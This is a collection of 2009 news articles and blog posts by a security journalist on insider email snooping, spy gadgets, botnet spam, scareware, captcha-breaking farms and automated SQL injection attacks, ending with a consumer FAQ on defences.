“The unauthorized extraction of information is epidemic and essentially unstoppable,” says Phil Lieberman, CEO of Lieberman Software, which makes password security systems.

Goldenberg’s caper illustrates just how easy it can be. In an interview, he said it all began in September 2007 when one of the sales reps who reported to him at AMX jumped ship to rival Sapphire, the sales arm of Crestron Electronics, a Rockleigh, N.J.-based maker of conferencing systems. Goldenberg says he inspected the company laptop turned in by the departing rep and found an e-mail from Sapphire welcoming the new recruit.

The message, he says, included the Web address to Sapphire’s e-mail server and the recruit’s new e-mail address and password. Goldenberg says he logged on as the recruit and quickly figured out the log-ons of three other employees. Like the recruit, they used their first name as part of their e-mail address – and as their password.

“He didn’t go searching for this,” says Dean Schneider, Goldenberg’s attorney. “It basically hit him in the face.”

For each e-mail account, Goldenberg activated a feature to forward copies of all incoming messages to a fresh Gmail account he created. He then spent long hours and days on end poring over Sapphire e-mail, says Bergen County prosecutor Brian Lynch. “It was voyeuristic,” says Lynch. “That’s why we recommended counseling.”

Court records show Goldenberg may have initially gained access to Sapphire’s e-mail months earlier than he claims.

“Admittedly some of our people’s passwords probably were not as strong as they should have been,” Suttenberg says. “But just because you have a cheap lock doesn’t mean it’s legal to pick the lock.”

The customer whom Goldenberg tried to steal contacted Sapphire to inquire how Goldenberg knew specifics about Sapphire’s discount before he did. Suttenberg talked the customer into sticking with Sapphire.

“He was too blatant,” she says of Goldenberg.

A new system

Suttenberg has since scrapped the bare-bones e-mail service supplied by her local Internet service provider, which cost her a few hundred dollars a month. She now pays thousands of dollars a month for an in-house Microsoft Exchange e-mail server brimming with security features. She also instructed her 10 employees to change their e-mail account passwords frequently and to avoid passwords “that your co-workers and contacts can figure out.”

While Suttenberg has buttoned up Sapphire, millions of small-business owners – and plenty of big corporations – continue to make it easy for larcenous insiders. With the exception of highly regulated banking and health care companies, most businesses are just beginning to discuss how to repel insider intrusions, security experts say.

The basics include taking stock of how sensitive information is conveyed, collected and stored – and strictly controlling who has access to it. “We’re seeing 70% to 80% of breaches originating from the inside,” says Vladimir Chernavsky, president of DeviceLock, which makes systems that restrict data transfers. “Companies need to enforce security policies and make sure employees know there are severe consequences to a breach.”

Spy toys

And then there are the janitors and groundskeepers to worry about, says J.D. LeaSure, a Virginia Beach counter-surveillance specialist. LeaSure makes his living conducting “sweeps” that ferret out miniature listening bugs and video cameras hidden in executive suites, conference rooms and other settings.

Insider intruders, he says, have come to see value in making audio and video recordings of certain closed-door discussions. They need only do a Web search on the phrase “spy bug,” and a trove of eavesdropping and peeping-Tom gadgetry that would impress James Bond turns up. LeaSure calls them “spy-shop toys.”

One of the latest: an ordinary-looking USB cable. You plug one end into a printer or other peripheral device and the other end into the computer’s USB port. Nothing looks amiss, and the cable operates normally. But it also houses a sensitive microphone and antenna that continually transmits a UHF audio signal to a receiver that can be up to 160 feet away. “You can hear every whisper within the confines of the room,”‘ says LeaSure.

There are dime-size “contact bugs,” which anyone could stick to the outside of a conference room window and matchbox-size “SIM bugs,” or listen-only cellphones that don’t ring or light up, that can be activated by a phone call an hour, a week or a month later.

Another readily available gadget looks like a luminescent jawbreaker. It is really a motion-activated video camera and digital video recorder capable of capturing 33 hours of activity. All one needs to do is perch it where it won’t be noticed on a Monday and retrieve it on a Friday.

LeaSure recently did a security sweep of the CEO’s office at a publicly traded corporation in the Southeast, which he declined to name because of client confidentiality. There, he found an innocuous-looking ballpoint pen in a cup with a handful of other pens and pencils. The pen wrote beautifully. It also contained a voice-activated audio recorder with 2 gigabytes of memory.

LeaSure set up a hidden surveillance camera and caught the janitor swapping out a fresh pen recorder every third day. The janitor was fired, with no other repercussions, after disclosing the identity of the insider who put her up to it.

That person stopped spying after being threatened with legal action, says LeaSure, but nothing else was done. “The principal did not want the stockholders or press getting a hold of the fact that company secrets were leaked because of what that would do to the company’s stock price,” he says.

My story delineates how botnet controllers of Waledac, Rustock and Pushdo exectued text book attacks. You can see the story here, or read it below:

USA TODAY

July 29, 2009

Spammers got busy when Michael Jackson died

By Byron Acohido, USA TODAY

LAS VEGAS – When Michael Jackson died on June 25, his fans mourned – and cybercriminals swung into action.

Within 38 hours, they forged alliances with familiar partners to trigger global spam campaigns that capitalized on the singer’s death.

That was a potent reminder of the dangers that computer-savvy lawbreakers pose in a world that increasingly depends on the Internet for communications and commerce.

“Cybercriminals hunt prey with a velocity that’s impossible for legitimate businesses to match,” says Patrick Peterson, Cisco chief security officer.

The attacks after Jackson’s death will be fresh on the minds of about 4,000 corporate managers gathering Wednesday to discuss cybercrime defenses at the annual Black Hat Vegas security conference.

“The bad guys are very adept at using Internet technologies,” says Dave Marcus, director of research and communications at anti-virus firm McAfee. “And unlike the good guys, they aren’t restrained by any laws or jurisdictional boundaries.”

Like most large-scale cyberattacks, the Jackson spamming runs were carried out by about a dozen elite crime gangs. Each controls networks of hundreds of thousands of infected home and workplace PCs, called bots, which they lease to clients who want to carry out scams.

Longstanding clients include sellers of non-certified pharmaceutical drugs, herbal remedies, replica designer goods and worthless anti-virus subscriptions. Their hard drives brim with e-mail and website marketing material and software to carry out online sales.

They attract attention by referring to headline news, including the election of President Obama, the swine flu outbreak – and celebrity deaths.

“They have templates ready so all they have to do is plug in words relating to a specific event,” says John Harrison, director of Symantec’s security response team.

So they were all set on the Thursday afternoon when news about Jackson’s death began to spread.

Trolling for hot topics

“These groups monitor news outlets, Twitter and other social-media sites to discover hot topics,” says Jose Nazario, manager of security research at Web security firm Arbor Networks.

Within a few hours, a smattering of amateurish spamming attacks began to appear. But the serious botnet gangs and cyberscammers took a little more time to coordinate large-scale campaigns.

By dawn on Saturday, a top botnet gang, Waledac, had a client: a well-known online drug retailer, GlavMed.com, also known as Canadian Pharmacy, Cisco senior researcher Henry Stern says.

The Waledac gang began deploying thousands of bots to spam out millions of e-mails with Web links purportedly leading to news about Jackson, he says. But the links actually redirected recipients to websites affiliated with GlavMed that sold sexual-performance drugs and pain killers.

A few hours later, another major botnet gang, known as Rustock, also blasted out Jackson-themed spam for GlavMed’s online shopping sites.

“Rustock is run by a different group of criminals, but here it was spamming the same e-mails as Waledac on behalf of a common client,” Peterson says.

A week after Jackson’s death, criminals out to steal sensitive data or hijack online financial accounts began to move in. A major botnet gang called Pushdo launched a large-scale spamming campaign with enticing messages including: “Who killed Michael Jackson? Visit X-Files to see the answer.” A Web link followed.

Clicking on it triggered what’s known as a “drive-by download.” The attacking bot scans for security holes in popular applications such as Internet Explorer, QuickTime and Adobe Acrobat Reader.

Breaking in

When it finds one, it swiftly secures access to the heart of the operating system, giving botnet controllers an opening to install any programs they want, including one called a root kit that makes the opening permanent.

Pushdo’s client also paid the gang to install a customized version of a malicious tool, called Zbot, that watches for when the PC user logs on to any banking website. Zbot then steals the user name and password and forwards it to the client.

As with most drive-by downloads, the Pushdo gang got a bonus. The opening created by the bot remained in place after the client’s work was done, giving the gang another bot for hire.

“This was just another routine spam campaign by Pushdo, but it had a malicious twist,” says Phil Hay, lead threat analyst at security firmMarshal8e6.

Find this article at:

http://www.usatoday.com/tech/news/2009-07-28-spam-michael-jackson_N.htm

Find initial version of this article here.

Those deceptive promotions crafted to panic you into spending $30 to $80 for worthless antivirus protection can hit you just about anywhere you turn on the Web. They arrive as booby-trapped Web links in e-mail and social network messages. They lurk hidden, and set to activate, when you click to popular, legitimate websites.

BLOG: Twitter used to spread scareware

And now scareware purveyors are embedding triggers in places you wouldn’t expect: on advertisements displayed at mainstream media websites; amid search results from Google, Yahoo Search and Windows Live search; alongside comments posted on YouTube videos; and, most recently, in “tweets” circulating on Twitter.

“Scareware is becoming a dominating force,” says Joe Stewart, director of SecureWorks Counter Threat Unit. “There are hundreds of criminals using every tactic they can think of to push these programs.”

Click on a trigger and you’ll get caught in an unnerving loop impossible to abort. A scanner window will appear with red-letter warnings listing viruses purportedly infesting your hard drive. A series of dialogue boxes will follow giving you choices that all lead to the same screen: a sales pitch.

Make the purchase, and you get a bogus inoculation. Try to cancel it, and you’ll get repeated offers. “It’s like stepping into quicksand,” says Paul Royal senior researcher at security firm Purewire. “The more you try to get out of it, the deeper you sink.”

Scareware has been a prominent part of the Internet since 2004, when a cybergang based in St. Petersburg, Russia, launched the iframecash.biz website and began offering commissions to anyone who helped them spread the SpySheriff fake antivirus program. Hackers began to taint legitimate websites so that pop-up ads for SpySheriff would launch on the PC of anyone who visited a corrupted Web page.

That simple arrangement has evolved into a steadily growing industry that marked a banner year in 2008. By late last year, more than 9,200 different types of scareware programs were circulating on the Internet, up from 2,800 at midyear, according to The Anti-Phishing Working Group. Microsoft recently reported that scareware infections rose 48% in the second half of 2008 vs. the first half. Microsoft analyzed data collected by use of its Malicious Software Removal Tool and found one specific fake security program on 4.4 million PCs.

“These guys are very innovative,” says Roel Schouwenberg, senior virus researcher at Kaspersky Lab. “They’re constantly looking for newer and easier ways to make money.”

Cutting-edge scareware marketing campaigns are being delivered via:

•YouTube and Twitter. The bad guys sign up for a handful of new YouTube or Twitter accounts. In the case of YouTube, crooks recently used about a dozen new accounts to begin posting comments on 30,000 videos, says Luis Corrons, technical director of PandaLabs. The comments enticed users to click on a link that triggered a scareware promotion.

In a variation of this ploy, crooks in late May created new Twitter accounts and began broadcasting tweets declaring “Best video” with a Web link of http://juste.ru, says Schouwenberg. Clicking on the link launched a sequence that replicated the message to everyone on the victim’s friends list, then launched a scareware promo.

•Search results. The bad guys create malicious Web pages and fill them with words and phrases that are likely to be popular search queries, such as “American Idol winner” or “NCAA tournament bracket,” says Yuval Ben-Itzhak, CTO of security firm Finjan. Next they insert tiny copies of their bad links on popular, legit websites that don’t do a thorough job of preventing such hacks.

“Search engine optimization” then takes over. SEO is the technology that determines the relevance of Web links to search queries. By embedding a malicious link on a popular website, the hackers imbue their Web page with high relevance. So when the legit site turns up as the No. 1 or No. 2 result for a popular search query, their bad link turns up as the No. 4 or No. 6 result. Anyone who clicks on the bad link gets a scareware pitch.

•Online ads. The bad guys purchase blocks of ad space on popular websites through a legit ad agency, says Roger Thompson, senior researcher at AVG. Next they instruct the ad agency to begin posting innocuous ads. To avoid detection, they only sporadically feed a corrupted ad into the mix. The bad ad looks safe, but carries instructions to route anyone who clicks to a scareware pitch. “It’s the most common attack we see every day,” Thompson says.

Mind-boggling profits

Powerful incentives undergird scareware. Security researchers say the industry is run by no more than a dozen or so top-level suppliers orchestrating the activity of several hundred “affiliate” distributors.

The top-level groups supply bogus scanners and cleanup tools – actual software – and collect payments and pay commissions. Bonuses can be generous. One top supplier, for instance, recently ran a contest offering a $36,000 Lexus sedan to the top-selling affiliate, says F-Secure senior researcher Mikko Hypponen.

“The top-level groups incentivize the affiliates and don’t get their hands dirty,” says Hypponen. “If they get any complaints, they can just blame the affiliate.”

Top-level groups typically work with 100 or more affiliates, who can earn commissions many different ways. Last fall, SecureWorks researcher Stewart infiltrated a Russian group known as the Baka Software gang. He accessed documentation showing one affiliate earned $146,525 in 10 days by spreading promotions for a worthless program, called Antivirus XP 2008, to more than 154,000 people, and closing sales to 2,772 of them. Another record showed five top Baka Software affiliates earning weekly commissions averaging $107,604.

“The sheer amounts of money involved in installing just one rogue program are mind-boggling,” Stewart says.

A few scareware affiliates have been slowed by regulators. Last fall, Microsoft and Washington state Attorney General Rob McKenna filed civil lawsuits against Branch Software, of The Woodlands, Texas, and Alpha Red, of Houston, charging that they were marketing scareware. And last December, the Federal Trade Commission obtained court orders prohibiting Innovative Marketing, of Belize, and ByteHosting Internet Services, of Cincinnati, from selling WinFixer, WinAntivirus, DriveCleaner, ErrorSafe, and XP Antivirus, all worthless.

The top-level suppliers, however, continue to operate with impunity, mainly based in Russia. And new affiliates crop up every day, full of fresh ideas to spread increasingly invasive promotions, security researchers say.

Consumer trust at risk

In the past two months, AVG’s free LinkScanner tool, which prevents users from clicking on malicious Web links, has been flushing out – on a daily basis – more than 30,000 Web pages displaying ordinary-looking ads embedded with hidden scareware triggers. Earlier this year the daily average was roughly 5,000, Thompson says.

The tech giants supplying the infrastructure for Web commerce, and media and social-networking companies capitalizing on Web marketing, are cognizant of the threat posed by escalating scareware, says Mike Zaneis, vice president of public policy for the Interactive Advertising Bureau, a trade association, whose members include Google, Yahoo, Microsoft, Facebook, NBC, USA TODAY and The New York Times.

“The industry is very committed to combating these attacks, because consumer trust is vital for us to do business,” Zaneis says. “It’s what keeps people online.”

Yet affiliates continue to demonstrate remarkable ingenuity. Contaminating search results is a complex endeavor. The affiliate group infiltrated by Finjan demonstrated how SEO hacks can result in a high-volume of promotions launched. Over a 16-day period, the group corrupted some 500,000 legitimate Web pages, and got nearly 2 million people to click on tainted search results. “These cybercriminals are motivated by the huge amount of money they can make very quickly,” says Ben-Itzhak.

Google spokesman Andrew Kovacs says the search giant works hard to preserve the integrity of search results. “We make constant improvements to our systems,” Kovacs says. “This issue is not specific to one company, and we encourage people to be vigilant about checking the URLs (Web links) of the websites they visit.”

That’s good advice, since scareware purveyors have shown they will strike wherever consumers congregate in large numbers. Take the affiliates who spread booby-trapped Web links via Twitter in late May. Kaspersky researcher Schouwenberg says anyone who clicked on one of their tweeted links got hit with a particularly nasty program. It shut down – and locked out – all other software applications, and insisted on purchase of a two-year license, for $49.95, to unlock the other apps. A lifetime license cost $79.95. “They’re beginning to cripple machines to make it more likely that you will pay up,” he says.

Pressure for change is growing

As scareware continues to escalate, public pressure for relief from deceptive promotions will increase, predicts John Pironti, a member of the education committee of the Information Systems Audit and Control Association, a global organization of auditors and security pros.

Pironti, president of IP Architects, a risk-management consultancy, would like to see more public-awareness campaigns and tighter controls to curtail scareware.

“Commercial industry has pushed us to use the Internet more, and interact in person with them less,” he says. “So now they need to take on a bigger responsibility for making things safer.”

By Byron Acohido, USA TODAY

See original version of story here.

SEATTLE – It’s become the new front in cybercrime: scams and identity-theft programs that attack e-mail accounts and users of social-networking sites such as Facebook and MySpace.

To carry out many of these automated attacks, cybercriminals first must overcome “captchas,” the distorted letters and characters that users of an e-mail or social-networking account are required to type to complete certain online forms. For years, captchas have helped to stop or bog down automated programs aimed at creating, among other things, e-mail accounts that promote scams such as fake computer virus protection and bogus accounts on social websites that can be used to collect personal information on legitimate users.

Now, security specialists say, a growing number of captcha-breaking groups are using real people to type in captcha responses for cybergangs around the world. This is allowing the gangs to create fake e-mail and social-network accounts by the tens of thousands – and use them as the starting point for a variety of cyberscams spread by e-mail and instant messages.

MySpace and Facebook say that, so far, they have kept such attacks largely in check. But security researchers say that as long as captchas are a key security feature on networking websites, cyberattacks on such sites are likely to intensify.

“We shouldn’t have any illusions about captchas,” says Sergei Shevchenko, a virus hunter at Internet security firm PC Tools. “If the professionals want to break in, they’ll do it.”

For social-networking sites that have exploded in popularity during the past two years – Facebook now claims more than 200 million members – the stakes are enormous.

The social networks, scrambling to build audiences and ad revenue, want to avoid e-mail’s fate: Today, 90% of all e-mail traffic is spam, and companies across the nation pour vast resources into keeping legitimate e-mail viable by filtering away spam.

Meanwhile, cybergangs recognize the opportunity to get fresh mileage from tried-and-true scams. They are repurposing ruses perfected in e-mail spamming to try to fool members of social networks into accepting – or even spreading – ads for fake products, data-stealing programs and other harmful computer bugs.

“Social-networking sites are a viral marketer’s dream,” says Paul Wood, analyst at Message Labs-Symantec, an Internet security firm. “The potential to tap into a huge community of like-minded individuals is enormous.”

A penny at a time

Captchas first appeared in 2001. They are based on the idea that humans – and not automated programs used by cybercriminals – can distinguish a word or group of characters shown as a warped graphical representation and then type them on an online form to gain access to a protected Web page.

Social networks typically require captchas for creating accounts and sending private messages that include Web links.

Captchas represent the first line of deterrence against automated programs, called bots, which typically are assembled in large groups known as botnets.

Bots are the little engines that propel online criminal activities. Bots, for example, are efficient at creating bogus Gmail, Hotmail, Yahoo and AOL messaging accounts, as well as memberships on MySpace, Facebook, Twitter and YouTube. These bogus accounts can serve as launching points to spread spam, steal data, pitch fake antivirus subscriptions – and scoop more PCs into the botnet.

Captcha designers have made their work increasingly distorted and camouflaged to defeat improved character-recognition programs carried by bots. Today, most major websites use advanced captchas that bots can’t resolve.

Enter captcha-breaking groups, bearing a new weapon that combines cheap labor with the Internet’s capacity for quick, anonymous global transactions.

Spawned in the online underground, these groups are difficult to pin down, security specialists say. But based on recruitment ads, discussions on hackers’ forums and the rising volume of bogus accounts being created, there appear to be dozens of captcha-breaking gangs employing hundreds of people in several countries, tech security researchers say.

Human captcha-solvers work piecemeal. They have shown up in Internet cafes or in sweatshops filled with Internet-connected PCs in China, India, Russia, Brazil, Argentina and Nigeria, working long shifts deciphering streams of characters forwarded by an unseen coordinator, researchers say.

“At least one major operation is being run out of Pakistan,” says Adam O’Donnell, director of emerging technologies at messaging security firm Cloudmark. “I suspect similar operations are being run anywhere that has bandwidth and cheap labor.”

Cybergangs typically pay captcha-solvers a half-cent to a penny for every captcha they complete, according to online recruitment ads on hackers’ forums that reflect how captcha-solving has become a growing underground business.

“You can pay a business for captcha-breaking services, and they’ll make it happen,” says Patrick Peterson, chief security researcher at Cisco. “You can have the captchas solved in the Internet cloud as you create each new account.”

Networks fight back

Without the emergence of for-hire captcha-breakers, a particularly destructive worm that plagued the Internet in May – known as Koobface – would not have been possible. A worm is a program designed to self-replicate across the Internet.

Koobface – a cockeyed spelling of Facebook – targeted MySpace and Facebook. It initiated messages that duped victims into clicking on a Web link to view a funny YouTube video.

Clicking on the link led to instructions to download a Flash Player update required to view the video. Clicking on the video player update downloaded a copy of the worm, which instantly searched out the victim’s friend lists on Facebook and MySpace and sent copies of itself to everyone on the list. So, subsequent victims received a message that actually arrived from the account of a trusted friend.

“This certainly represented the sullying of what began as a clear, worry-free place to interact with peers,” says Joel Smith, chief technology officer at messaging security firm AppRiver.

MySpace and Facebook scrambled to warn users about Koobface, block suspicious Web links and take other defensive measures.

“We’ve been working for months to limit the distribution of Koobface over Facebook,” says Facebook spokesman Barry Schnitt. “We take the security of our users very seriously and have invested significant resources in protecting them.”

MySpace Chief Security Officer Hemanshu Nigam says improved security has reduced spam that reaches the network’s members by 73% since Koobface first appeared. MySpace beefed up its message-filtering systems and developed a tool to warn members about suspicious links.

“We have put in a lot of features to cleanse things like Koobface,” Nigam says.

Researchers don’t know who created or controls Koobface, which continues to morph on the Web. In mid-March, Microsoft added Koobface detection to its Malicious Software Removal Tool (MSRT), which automatically checks PCs running non-pirated copies of Windows Vista, Windows XP, Windows 2000 and Windows Server 2003 for more than 100 viruses.

In the ensuing two weeks, MSRT removed Koobface nearly 200,000 times from 133,677 PCs.

“Koobface is constantly changing to avoid detection, with over 20,000 variations to date,” Jeff Williams, Microsoft Malware Protection Center program manager, said in a blog post. “We’re also working to detect new variants of the Koobface virus as they’re discovered, so we can provide ongoing protection from this threat.”

A ’shark’ in ‘warm waters’

Early versions of Koobface focused on spreading the worm far and wide.

Besides copying itself to everyone on victims’ friend lists, the worm stole cookies – small pieces of text, stored in the users’ Web browsers. But it stole only those cookies that contained user IDs and passwords for members of social-networking sites Friendster, BlackPlanet, Bebo, Hi5, LiveJournal and MyYearbook. That gave the attackers starting points to launch the worm in the more popular social networks, says Kurt Baumgartner, chief threat officer at PC Tools.

As Koobface steadily added capabilities, Baumgartner observed it begin to incorporate malicious programs widely used by other criminal groups:

•Adware for a $50 fake antivirus program, called Security Protect 2009, that’s now also being spread by the Conficker worm.

•Coding that turns an infected PC into a spam-spreading bot, the same coding used by the huge Waledac e-mail virus.

•A program called ZeuS that steals user IDs and passwords from a customizable list of banks.

“Koobface is like a shark that has found itself in warm waters with plenty of prey,” Baumgartner says.

Monitoring Koobface with Baumgartner has been colleague Shevchenko, a Russian expatriate. Shevchenko made some startling discoveries about captcha breakers. Monitoring Russian-language forums, he found an ad headlined “Kolotibablo,” which means “make easy money.”

The job description as translated by Shevchenko: “Your new job is printing English text that you see in the pictures. (Images of captchas were shown.) All you need is to know English alphabet and know where the keys are located on a keyboard. For every correctly entered word you will receive up to 1 cent, depending on the level that you have achieved. Your only limit is your typing speed. Every minute, you’ll be able to correctly type the text from 10 pictures on average. Thus, with an average price of 0.5 cent per one correctly typed text from a picture, your salary will be 3 US dollars per hour.”

Shevchenko conducted an experiment. First, he reverse-engineered Koobface to discover where the worm sent captchas to be resolved. Next, he generated and saved 100 captchas issued by Facebook, MySpace, Gmail, Yahoo Mail and Hotmail. And finally he built a tool that could submit the 100 captchas to Koobface’s resolvers.

Shevchenko’s findings, widely cited in tech security circles, astounded many of his peers, a band of about 200 or so elite virus hunters around the world. Two-thirds of the captchas came back resolved in less than 30 seconds. The unresolved words or characters were more highly distorted and thus more difficult to solve.

Some rejects came back with letters typed from one side of the keyboard, such as “asdfg,” indicating a human resolver was typing gibberish to quickly get to an easier puzzle. Shevchenko resubmitted the rejects, and eventually all 100 sample captchas were successfully resolved.

“I was just amazed with the effectiveness of the system,” Shevchenko says.

As a parting shot, Shevchenko submitted a captcha of his own composition to let the captcha-solvers know someone was on to them: “Don’t be a monkey respect yourself.”

The message came back solved in 23 seconds.

Find this article at:

http://www.usatoday.com/tech/news/computersecurity/2009-04-22-captcha-code-breakers_N.htm

That stroke of genius dawned on a criminal coder, possibly Chinese, a little less than a year ago. The result: in just 10 months, botnet-driven SQL injection attacks have been used to plant infections on multi-millions of webpages. These infections now lurk in wait for anyone who happens to click to what appears to be a reputable website.

Click on a tainted webpage and you won’t notice anything amiss. But here’s what happens next: A backdoor gets silently implanted on your harddrive. Through that backdoor the attacker will send coding that silently turns your machine into obedient “bot.” Your botted PC gets slotted into a bot network of 10,000 or more other bots.

As part of this botnet, your machine may be used to deploy spam, spread infections, steal data, launder stolen funds, participate in extortionist denial of service attacks or wage political warfare against small nations. And for good measure: a datastealer will also get installed on your harddrive; it will clean out your email address book and buddy lists, and thus converting all of your contacts into targets for similar infections. And henceforth any information you type at account logon pages, online banking forms, shopping carts — any webpage with a submit buttion — will will get summarily harvested.

History of SQL injection attacks

SQL injection attacks have been around for years. They require time and skill, and were traditionally done manually. A SQL attack involves querying the databases underlying a web page — until the database hiccups and accepts an injection of malicious code. The intruder then gains full access to the data, and a foothold to roam deeper. Socrates, the meth-addicted hacker I wrote about in Zero Day Threat, used a SQL hack to break into a Michigan uniform company’s website to steal 3,000 customer profiles, which he gave to his love interest, Hula Girl. This was back in 2005.

At some point in the spring of 2008, a bright hacker “had a Eureka moment,” says Ryan Barnett, Breach Security’s Director of Research. Instead of trying to steal data from one website at a time, why not use botnets to probe the Interent for webpages whose databases could be easily injected with a small bit of code — just enough to implant backdoor infections.

“It was a brilliant tactical move,” says Barnett. “To say, ‘if our end goal is to obtain sensitive personal data, hey, wait a minute! Why are we only targeting databases that might hold the information? Why don’t we put malware on the sites, and when people go to the legitimate, regular websites; then people will get infected with our javascript? And we can install keystroke loggers and get the data that way.’

“It was pretty crafty,” says Barnett.

450,000 webpages attacked daily

LastWatchdog has been unable to get anyone to estimate  how many reputable websites  have been tainted since then. But the number must be  easily into the multi-millions of webpages. Automated SQL attacks began surfacing last April when 100,000 webpages of the British civil service, United Nations and U.S. Environmental Protection Agency we so hacked.

“The current thinking is the bad guys, thought to be Chinese in origin, use search engines results to identify likely attack targets,” Jeremiah Grossman, White Hat Security founder and CTO told LastWatchdog in spring 2008.  “Next they blindly send in malicious SQL injection traffic to the target websites . . .When someone visits one of these hundreds of thousands of infected web pages, their browser is instructed to connect to a hacker controlled site behind the scenes that exploits their browser and loads their machine with malware.”

For the first five months of 2008 IBM ISS helped large corporations block about 5,000 SQL attacks a day. By mid-June, daily attacks spiked to 25,000; by October they topped 450,000 a day.  And keep this in mind: those blocks only protect corporations that retain IBM ISS to defend their networks. Websites that don’t pay for comparable protection are getting engulfed by the same wave of automated SQL injection attacks, says Holly Stewart, IBM ISS threat response manager.

Cyber crime gangs are “finding tons of sites that have a set of conditions that will allow them to inject malicious software which will infect anyone who visits that site,” says Jack Danahy, founder and CTO of security firm Ounce Labs.

Everything you should know about SQL injection attacks

Below is a FAQ on SQL injection attacks compiled by LastWatchdog with guidance from — and gratitude extended to — Breach Security, WhiteHat, IBM ISS, Guardium and Ounce Labs.

Q: What is a SQL injection attack?

A: SQL refers to the layer of databases underlying most websites.  SQL attacks involves an unauthorized party injecting coding into one of these databases — coding that should not be there. An intruder can can do this by typing coding into the browser URL address line, or into any box of any webform, such as those found on account logon pages or shopping carts.

Q: How are SQL injection attacks typically carried out?

A: Prior to the spring of 2008, SQL attacks were done manually. The hacker would try different database queries from the browser or from pages displaying  web forms, until he successfully injected code into the underlying database. These types of attacks are still done, but on a smaller scale compared to the automated SQL infection/attacks that have come on strong.

Major banks and online merchants are putting up strong defenses, says Phil Neray, Guardium vice-president of security strategy, at Guardium. But regional banks and credit unions, smaller online retailers, and many government agencies remain highly vulnerable to manual, targeted SQL attacks.

As cited above, some  100,000 webpages of the British civil service, United Nations and U.S. Environmental Protection Agency we so hacked in spring 2008. More recently, Commerce Bank, a small Midwest bank that operates 360 branches in Missouri, Illinois and Kansas, Scarborough & Tweed, a New Hampshire-based company that sells corporate gifts online, and a Rhode Island government Web site  got hit, according to  Neray.

Q: Are manuul SQL injections still a big concern?

A: Yes. Manual, one-off SQL injection hackers are still out there making a living. Not only can these  intruders clean out a customer database, they can get a foothold inside of the corporate network serving up the company’s website.

“We’ve seen numerous instances in which attacks leveraged SQL vulnerabilities in order to get inside of corporate networks and gtet access to internal systems and information that was not supposed to be exposed to the Internet,” says Tom Cross, Manager, X-Force Advanced Research, at IBM ISS. “When we first started seeing this kind of attack occurring, it was pretty amazing how simple and straightforward it was, yet how deep the intruder could infiltrate the infrastructure and be relatively unseen.

“The bad guys are getting in and are not being detected,” Cross continued. “They’re finding and taking what they want and leaving, not bothering to clean up.”

Q: What was the breakthrough that enabled automated SQL attacks?

A: In the spring of 2008, a criminal coder discovered that Microsoft SQL databases would accept javascript, the shorthand coding that enables cool website features. Microsoft contends in this SQL security alert that there is nothing wrong with its database products. Instead, the software giant blames sloppy coding by web application developers who write the programs that tap into the underlying databases.

This discovery touched off a gold rush by white hat, black hat and grey hat researchers to find security holes in widely-used, off-the-shelf web applications. In 2008, researchers found 134% more web application vulnerabilities than in 2007. To be more precise, these were flaws that could enable the injection of javascript into Microsoft databases, according to IBM ISS.

What’s worse, to date 74% of these recently revealed SQL security holes have no available security patch.

Keep in mind those metrics apply to garden-variety web applications. Many websites use custom made web applications; and these more sophisticated programs are even more susceptible to SQL attacks, says IBM’s Stewart.

Q: So the bad guys discovered javascript could be injected into Microsoft databases via poorly written web applications. How did they make hay of that development?

A: First, the bad guys developed tools to search out SQL vulnerabilities in off-the-shelf and custom web applications being used by web sites all across the Internet. “Automated tools that search for SQL injection vulnerabilities are able to find these vulnerabilities in standard and custom web applications alike,” says IBM’s Stewart.

Second, the bad guys began to instruct their botnets to inject malicious javascript into Microsoft databases, via flawed web applications, by the tens of thousands. “They figured out a way to scale it, and make it a broad attack,” says Barnett, of Breach Security.

The javascript didn’t do anything terribly invasive. It simply embedded an infection, so that anyone clicking to the tainted webpage thereafter got a backdoor installed — effectively turning full control of the machine over  to the intruder.

Q: What are the bad guys doing with all of this stolen personal data?

A: ID theft, of course, begins with stolen data. And millions of tainted websites lurking to silently infect visitors with data stealers appear to be swelling the gigantic pool of stolen identity data, along with viral spam campaigns, such as Waledec and KoobFace. And let’s not forget big data heists, such as the recent breach at Heartland Payments Systems.

It’s not a coincidence that identity theft is also rising. Nearly twice as many people — 7.5% of all U.S. adults — lost money as part of some sort of financial fraud in 2008 according to this survey by Gartner banking analyst Avivah Litan.  Last Fall, Litan surveyed 5,000 consumers. She found 70% had never been a victim of identity theft fraud; 14% had had their credit card information used to charge purchases or get money; 7% said their debit card was used; 6% said a new account had been opened in their name; 5% had money transferred out of their account; and 4% had had checks forged.

“It’s not getting better, it’s getting worse,” says Litan. “I think this coming year will be more severe. A lot of stolen data has yet to be used.”

Q: What can the average person do to avoid getting one of these infections?

A: Do your homework and be ready to give up convenience. There are numerous consumer tools designed to assess the goodness of the Web page you are about to click to, and tell you whether it’s safe. AVG LinkScanner, ScanSafe, McAfee SiteAdvisor,  Enigma SpyHunter and  Authentium SafeCentral are browser-based security tools worth checking out.

And here’s a tip: WinPatrol offers very powerful protection. It’s a terrific free tool, popular with techies since it was created 10 years ago by Bill Pytlovany, one of the original designers of AOL and a longtime open-source practitioner. The premier version, called WinPatrol Plus, costs just $30 for a lifetime subscription, which includes all updates, and is designed for the average consumer. WinPatrol takes a snapshot of your Windows run registry, and from then on blocks and alerts you to any new executable program, such as a malicious backdoor, that tries to install itself on your hard drive.

But that’s not enough. You must do all of your software updates promptly. Most SQL infections  work by exploiting long-ago discovered security flaws in your browser –  and in the programs that serve up Web-hosted video, music, photos, documents and work files. Keeping all of these web applications up to date will go a long way toward innoculating you.

This includes keeping current on updates for Internet Explorer, Firefox, Safari, Opera, Chrome, Adobe Flash, Adobe Reader, iTunes, QuickTime, Windows Media Player and RealPlayer. Microsoft and Mozilla do a credible job of alerting users to security updates for the IE and Firefox browsers, respectively.  But the rest of the software vendors don’t make it clear the updates increasingly include security patches.

–by Byron Acohido

Photos of Ryan Barnett, Obama, Avivah Litan, Jeremiah Grossman